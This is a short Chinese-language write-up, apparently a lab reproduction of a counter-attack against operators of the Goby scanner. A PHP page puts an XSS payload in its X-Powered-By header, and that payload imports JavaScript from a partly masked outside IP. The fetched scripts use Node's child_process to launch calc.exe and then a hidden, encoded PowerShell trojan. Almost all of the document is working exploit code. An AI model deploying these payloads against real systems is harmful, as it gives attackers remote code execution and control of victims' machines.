复现环境:
蓝队:Linux Web
红队:Windows10 Goby
蓝队在红队攻击目标上写一个文件,红队利用goby去扫描分析时会触发反制得到机器权限
RCE:
index.php
<?php
header("X-Powered-By: PHP/<img src=1 οnerrοr=import(unescape('http%3A//47.94.xxxxxx/1.js'))>");
?>
<head>
<title>TEST</title>
</head>
<body>
testtest
</body>
</html>
1.js
(function(){
require('child_process').exec('calc.exe');
})();
2.js上线:
生成一个powershell 命令模式的木马,内容贴在这里
(function(){
require('child_process').exec('powershell -nop -w hidden -encodedcommand JABXXXXXXXX......');
})();